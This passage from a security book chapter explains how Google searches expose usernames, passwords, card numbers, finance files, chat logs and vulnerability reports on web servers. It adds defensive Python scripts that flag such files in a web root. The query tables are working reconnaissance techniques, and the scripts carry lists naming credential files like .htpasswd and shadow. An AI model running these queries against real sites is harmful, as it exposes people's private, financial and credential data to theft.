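    for match in CARD_RE.finditer(text):
        digits = re.sub(r"\D", "", match.group())
        if luhn_ok(digits):
            found.append(digits)
    return found


def plausible_ssn(area, group, serial):
    """Structural rules for an issued SSN (not proof that it belongs to anyone)."""
    if area in ("000", "666") or area.startswith("9"):
        return False
    return group != "00" and serial != "0000"


def find_ssns(text):
    return [m.group() for m in SSN_RE.finditer(text) if plausible_ssn(*m.groups())]


SAMPLE_TEXT = (  # constructed
    "Order 1234 5678 9012 3456 shipped to J. Doe, phone 555-0100. "
    "Card 4111-1111-1111-1111 exp 12/09, backup card 5500000000000004. "
    "SSN 123-45-6789; the values 666-12-3456 and 987-65-4320 are never issued."
)

if __name__ == "__main__":
    print("card numbers:", find_card_numbers(SAMPLE_TEXT))
    print("SSNs:", find_ssns(SAMPLE_TEXT))
```

The 16-digit order number in the sample fails Luhn and is dropped, while both test card numbers pass; of the three SSN-shaped values only the one with an issuable area number survives. Run something like this over the spreadsheets and exports on a web server, and over anything about to be published, rather than waiting for a search engine to index them.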
Personal Financial Data
In some cases, phishing scams are responsible for publicizing personal information;
in other cases, hackers attacking online retailers are to blame for this breach of
privacy. Sadly, there are many instances where an individual is personally responsible
for his own lack of privacy. Such is the case with personal financial information.
With the explosion of personal computers in today’s society, users have
literally hundreds of personal finance programs to choose from. Many of these
programs create data files with specific file extensions that can be searched with
Google. It’s hard to imagine why anyone would post personal financial information
to a public Web site (which subsequently gets crawled by Google), but it
must happen quite a bit, judging by the number of hits for program files generated
by Quicken and Microsoft Money, for example. Although it would be
somewhat irresponsible to provide queries here that would unearth personal
financial data, it’s important to understand the types of data that could potentially
be uncovered by an attacker.To that end,Table 9.4 shows file extensions for various
financial, accounting, and tax return programs. Ensure that these filetypes
aren’t listed on a webserver you’re charged with protecting.
Table 9.4 File Extensions for Financial, Accounting, and Tax Return Programs
    afm      Abassis Finance Manager
    ab4      Accounting and Business File
    mmw      AceMoney File
    Iqd      AmeriCalc Mutual Fund Tax Report
    et2      Electronic Tax Return Security File (Australia)
    tax      Intuit TurboTax Tax Return
    t98-t04  Kiplinger TaxCut File (extension based on two-digit return year)
    mny      Microsoft Money 2004 Money Data Files
    mbf      Microsoft Money Backup Files
    inv      MSN Money Investor File
    ptdb     Peachtree Accounting Database
    qbb      QuickBooks Backup Files reveal financial data
    qdf      Quicken personal finance data
    soa      Sage MAS 90 accounting software
    sdb      Simply Accounting
    stx      Simply Tax Form
    tmd      Time and Expense Tracking
    tls      Timeless Time & Expense
    fec      U.S. Federal Campaign Expense Submission
    wow      Wings Accounting File
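"Ensure that these filetypes aren't listed on a webserver you're charged with protecting" is the instruction; as an added example (not code from the text), the script below is one way to act on it for the file names in the password and username query tables above and the extensions in Table 9.4. It walks a web root, flags files by name or extension, flags backup copies, and flags directories with no index file, since those become the "Index of" listings most of the queries in this chapter rely on when directory listings are enabled. The name and extension lists are assembled from the tables above (with a few additions taken from the same queries); the web root is hypothetical and the demo builds a constructed tree.

```python
"""Added example, not part of the original text: check a web root for the
file names and types the queries in this chapter look for.

Google only finds what a server exposes, so the cheapest defence is to look
before the crawler does. The name and extension lists below are taken from
the tables above (a few FrontPage and mail-client names are added from the
same queries); the directory tree the demo builds is constructed for the
example and the web root path is hypothetical.
"""
import os
import re
import shutil
import tempfile

# Exact file names the password and username queries key on (lower-case).
SENSITIVE_NAMES = {
    ".htpasswd", "htpasswd.bak", ".htaccess.bak", "service.pwd", "administrators.pwd",
    "authors.pwd", "ws_ftp.ini", "flashfxp.ini", "sites.ini", "wcx_ftp.ini",
    "servudaemon.ini", "config.php", "connect.inc", "globals.inc", "dbconn.inc",
    "passwd", "passwd.bak", "shadow", "master.passwd", "pwd.db", "spwd.db",
    ".netrc", "slapd.conf", "lilo.conf", "zebra.conf", "ospfd.conf", "vtund.conf",
    "wvdial.conf", "psybnc.conf", "password.log", "password.dat", "passlist.txt",
    "people.lst", "auth_user_file.txt", "main.mdb", "wand.dat", "perform.ini",
    "john.pot", ".bash_history", ".sh_history", "cookies.txt", "mt-db-pass.cgi",
}
# Extensions from the personal finance table plus credential-bearing types.
SENSITIVE_EXTS = {
    ".afm", ".ab4", ".mmw", ".et2", ".tax", ".mny", ".mbf", ".inv", ".ptdb", ".qbb",
    ".qdf", ".soa", ".sdb", ".stx", ".tmd", ".tls", ".fec", ".wow",
    ".pwd", ".pwl", ".reg", ".rdp", ".wab", ".pst", ".dbx", ".pot", ".blt", ".ctt",
}
TAXCUT_EXT = re.compile(r"\.t(9[89]|0[0-4])$")  # Kiplinger TaxCut .t98 to .t04
INDEX_FILES = {"index.html", "index.htm", "index.php", "default.asp", "default.htm"}


def classify(filename):
    """Reason a file should not sit in a web root, or None if it looks harmless."""
    lower = filename.lower()
    ext = os.path.splitext(lower)[1]
    if lower in SENSITIVE_NAMES:
        return "credential or configuration file targeted by the queries above"
    if ext in SENSITIVE_EXTS or TAXCUT_EXT.search(lower):
        return "personal finance, mail or credential file type"
    if lower.endswith(".bak") or lower.endswith("~"):
        return "backup copy that may expose source code or credentials"
    return None


def scan_webroot(root):
    """Walk a web root and return sorted (relative path, reason) findings.

    A directory with no index file is reported too: with directory listings
    enabled it becomes one of the 'Index of' pages most queries here rely on.
    """
    findings = []
    for dirpath, _dirnames, filenames in os.walk(root):
        rel_dir = os.path.relpath(dirpath, root).replace(os.sep, "/")
        if not {name.lower() for name in filenames} & INDEX_FILES:
            findings.append((rel_dir, "no index file: autoindex would publish a directory listing"))
        for name in filenames:
            reason = classify(name)
            if reason:
                findings.append((name if rel_dir == "." else rel_dir + "/" + name, reason))
    return sorted(findings)


def demo():
    """Constructed web root with the kinds of mistakes the chapter describes."""
    root = tempfile.mkdtemp()
    for rel in ["index.html", "images/logo.gif", "_vti_pvt/service.pwd",
                "admin/index.php", "admin/config.php", "downloads/index.htm",
                "downloads/budget.qdf", "downloads/taxes.t03",
                "includes/index.html", "includes/connect.inc.bak"]:
        path = os.path.join(root, *rel.split("/"))
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "w") as handle:
            handle.write("constructed sample content\n")
    try:
        return scan_webroot(root)
    finally:
        shutil.rmtree(root)


if __name__ == "__main__":
    for path, reason in demo():
        print("%-28s %s" % (path, reason))
```

A name match is only a hint that the file deserves a look; a config.php that contains no credentials is fine where it is, while a service.pwd under _vti_pvt is exactly what the FrontPage queries above are written to find. Missing index files are reported regardless of content because the fix (an index file or disabling autoindex) is cheap.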
Searching for Other Juicy Info
As we’ve seen, Google can be used to locate all sorts of sensitive information. In
this section we take a look at some of the data that Google can find that’s harder
to categorize. From address books to chat log files and network vulnerability
reports, there’s no shortage of sensitive data online.Table 9.5 shows some queries
that can be used to uncover various types of sensitive data.
Query                                                             Description
intext:"Session Start * * * *:*:* *" filetype:log                 AIM and IRC log files
filetype:blt blt +intext:screenname                               AIM buddy lists
buddylist.blt                                                     AIM buddy lists
intitle:index.of cgiirc.config                                    CGIIRC (Web-based IRC client) config file, shows IRC servers and user credentials
inurl:cgiirc.config                                               CGIIRC (Web-based IRC client) config file, shows IRC servers and user credentials
"Index of" / "chat/logs"                                          Chat logs
intitle:"Index Of" cookies.txt "size"                             cookies.txt file reveals user information
"phone * * *" "address *" "e-mail" intitle:"curriculum vitae"     Curriculum vitae (resumes) reveal names and address information
ext:ini intext:env.ini                                            Generic environment data
intitle:index.of inbox                                            Generic mailbox files
"Running in Child mode"                                           Gnutella client data and statistics
":8080" ":3128" ":80" filetype:txt                                HTTP proxy lists
intitle:"Index of" dbconvert.exe chats                            ICQ chat logs
"sets mode: +p"                                                   IRC private channel information
"sets mode: +s"                                                   IRC secret channel information
"Host Vulnerability Summary Report"                               ISS vulnerability scanner reports, reveal potential vulnerabilities on hosts and networks
"Network Vulnerability Assessment Report"                         ISS vulnerability scanner reports, reveal potential vulnerabilities on hosts and networks
filetype:pot inurl:john.pot                                       John the Ripper password cracker results
intitle:"Index Of" -inurl:maillog maillog size                    Maillog files reveal e-mail traffic information
ext:mdb inurl:*.mdb inurl:                                        Microsoft FrontPage database folders
filetype:xls inurl:contact                                        Microsoft Excel sheets containing contact information
intitle:index.of haccess.ctl                                      Microsoft FrontPage equivalent (?) of htaccess, shows Web authentication info
ext:log "Software: Microsoft Internet Information Services *.*"   Microsoft Internet Information Services (IIS) log files
filetype:pst inurl:"outlook.pst"                                  Microsoft Outlook e-mail and calendar backup files
intitle:index.of mt-db-pass.cgi                                   Movable Type default file
filetype:ctt ctt messenger                                        MSN Messenger contact lists
"This file was generated by Nessus"                               Nessus vulnerability scanner reports, reveal potential vulnerabilities on hosts and networks
inurl:"newsletter/admin/"                                         Newsletter administration information
inurl:"newsletter/admin/" intitle:"newsletter admin"              Newsletter administration information
filetype:eml eml intext:"Subject" +From                           Outlook Express e-mail files
intitle:index.of inbox dbx                                        Outlook Express mailbox files
filetype:mbx mbx intext:Subject                                   Outlook v1–v4 or Eudora mailbox files
inurl:/public/?Cmd=contents                                       Outlook Web Access public folders or appointments
filetype:pdb pdb backup (Pilot Pluckerdb)                         Palm Pilot Hotsync database files
"This is a Shareaza Node"                                         Shareaza client data and statistics
inurl:/_layouts/settings                                          SharePoint configuration information
inurl:ssl.conf filetype:conf                                      SSL configuration files, reveal various configuration information
site:edu admin grades                                             Student grades
intitle:index.of mystuff.xml                                      Trillian user Web links
inurl:forward filetype:forward -cvs                               UNIX mail forward files reveal e-mail addresses
intitle:index.of dead.letter                                      UNIX unfinished e-mails

Summary
Make no mistake—there’s sensitive data on the Web, and Google can find it.
There’s hardly any limit to the scope of information that can be located, if only
you can figure out the right query. From usernames to passwords, credit card and
Social Security numbers, and personal financial information, it’s all out there. As a
purveyor of the “dark arts,” you can relish the stupidity of others, but as a professional
tasked with securing a customer’s site from this dangerous form of
information leakage, you could be overwhelmed by the sheer scale of your
defensive duties.
As droll as it might sound, a solid, enforced security policy is a great way to
keep sensitive data from leaking to the Web. If users understand the risks associated
with information leakage and understand the penalties that come with violating
policy, they will be more willing to cooperate in what should be a security
partnership.
In the meantime, it certainly doesn’t hurt to understand the tactics an adversary
might employ in attacking a Web server. One thing that should become
clear as you read this book is that any attacker has an overwhelming number of
files to go after. One way to prevent dangerous Web information leakage is by
denying requests for unknown file types. Whether your Web server normally
serves up CFM, ASP, PHP, or HTML, it’s infinitely easier to manage what should
be served by the Web server instead of focusing on what should not be served.
Adjust your servers or your border protection devices to allow only specific content
or file types.
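The allow-list approach above can also be checked from the defender's side before the server configuration is touched. The following audit script is an added example, not code from the book: it walks a Web document root, reports every file whose type is not on a list of types the server is meant to serve, and separately flags the ones whose extension or filename matches the sensitive data types this chapter's tables list. The allow-list, the sensitive-type sets and the sample file tree are assumptions constructed for the example.

```python
# Added example, not code from the book: audit a document root against an
# allow-list of servable file types, flagging the chapter's sensitive types.
import tempfile
from pathlib import Path

# Types the Web server is meant to serve; anything else should be denied.
SERVED_TYPES = {".html", ".htm", ".php", ".asp", ".cfm", ".css", ".js",
                ".png", ".jpg", ".gif"}
# Extensions the chapter's tables tie to sensitive data (assumed subset).
SENSITIVE_TYPES = {".pst", ".dbx", ".mbx", ".eml", ".mdb", ".qdf", ".mny",
                   ".mbf", ".qbb", ".pot", ".blt", ".ctt", ".log", ".xls",
                   ".pdb", ".ini", ".conf"}
# Exact filenames the chapter's queries look for (assumed subset).
SENSITIVE_NAMES = {"cookies.txt", "cgiirc.config", "dead.letter",
                   "haccess.ctl", "mt-db-pass.cgi", "buddylist.blt",
                   "john.pot", ".forward"}


def audit_docroot(root):
    """Return (denied, sensitive): paths relative to root whose type is not
    on the allow-list, and the subset of those that look like leaked data."""
    root = Path(root)
    denied, sensitive = [], []
    for path in sorted(root.rglob("*")):
        if not path.is_file():
            continue
        rel = path.relative_to(root).as_posix()
        ext, name = path.suffix.lower(), path.name.lower()
        if ext in SERVED_TYPES:
            continue                      # served on purpose, nothing to flag
        denied.append(rel)                # would be blocked by an allow-list
        if ext in SENSITIVE_TYPES or name in SENSITIVE_NAMES:
            sensitive.append(rel)         # matches a type the chapter warns about
    return denied, sensitive


def build_sample_docroot():
    """Constructed sample tree (hypothetical names) so the audit runs offline."""
    root = Path(tempfile.mkdtemp(prefix="docroot-"))
    for rel in ["index.html", "app/login.php", "img/logo.png", "README",
                "backup/outlook.pst", "data/accounts.qdf",
                "chat/logs/aim.log", "tmp/john.pot"]:
        target = root / rel
        target.parent.mkdir(parents=True, exist_ok=True)
        target.write_text("constructed sample content\n")
    return root


if __name__ == "__main__":
    denied, sensitive = audit_docroot(build_sample_docroot())
    print("not on allow-list:", denied, "\nlooks like leaked data:", sensitive)
```

Anything in the first list is a candidate for removal from the document root or for an explicit deny rule; the second list is what to deal with first.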
Solutions Fast Track
Searching for Usernames
- Usernames can be found in a variety of locations.
- In some cases, digging through documents or e-mail directories might
  be required.
- A simple query such as "your username is" can be very effective in
  locating usernames.

Searching for Passwords
- Passwords can also be found in a variety of locations.
- A query such as "Your password" forgot can locate pages that provide a
  forgotten-password recovery mechanism.
- intext:(password passcode pass) intext:(username userid user) is
  another generic search for locating password information.
Searching for Credit Card Numbers, Social Security Numbers, and More
- Documents containing credit card and Social Security number
  information do exist and are relatively prolific.
- Some irresponsible news outlets have revealed functional queries that
  locate this information.
- There are relatively few examples of personal financial data online, but
  there is a great deal of variety.
- In most cases, specific file extensions can be searched for.
Searching for Other Juicy Info
- From address books and chat log files to network vulnerability reports,
  there’s no shortage of sensitive data online.